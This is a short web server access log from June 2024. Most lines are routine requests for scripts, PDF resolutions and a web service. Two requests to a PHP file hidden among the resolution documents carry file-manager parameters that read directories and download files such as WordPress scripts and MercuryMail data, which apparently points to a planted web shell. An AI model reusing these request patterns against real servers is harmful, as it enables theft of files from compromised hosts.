161.18.222.72 - - [16/Jun/2024:13:27:29 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
161.18.222.72 - - [16/Jun/2024:13:27:29 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
161.18.222.72 - - [16/Jun/2024:13:27:29 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
216.244.66.195 - - [16/Jun/2024:13:27:39 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202016/0526.pdf HTTP/1.1" 200 483153
161.18.222.72 - - [16/Jun/2024:13:27:45 -0500] "POST /sipse/faces/presentacion/financiero/modificacionContrato/cargarModifiacion.xhtml HTTP/1.1" 200 5331
216.244.66.195 - - [16/Jun/2024:13:27:55 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202016/0666.pdf HTTP/1.1" 200 970441
161.18.222.72 - - [16/Jun/2024:13:28:00 -0500] "POST /sipse/faces/presentacion/financiero/modificacionContrato/cargarModifiacion.xhtml HTTP/1.1" 200 5411
216.244.66.195 - - [16/Jun/2024:13:28:10 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202016/0782.pdf HTTP/1.1" 200 676719
201.245.192.253 - - [16/Jun/2024:13:28:22 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
216.244.66.195 - - [16/Jun/2024:13:28:25 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202016/1268.pdf HTTP/1.1" 200 967162
216.245.221.92 - - [16/Jun/2024:13:28:27 -0500] "HEAD / HTTP/1.1" 200 -
47.128.118.18 - - [16/Jun/2024:13:28:35 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Ccumbredelclima%5Cwp-includes%5Cjs%5C&f=media-views.js&ft=download HTTP/1.1" 200 224564
216.244.66.195 - - [16/Jun/2024:13:28:38 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202016/1272.pdf HTTP/1.1" 200 617741
216.244.66.195 - - [16/Jun/2024:13:28:50 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202016/1528.pdf HTTP/1.1" 200 3324108
47.128.54.129 - - [16/Jun/2024:13:28:57 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5CMercuryMail&f=order32.hlp&ft=download HTTP/1.1" 200 10049
201.245.192.253 - - [16/Jun/2024:13:28:54 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 34566
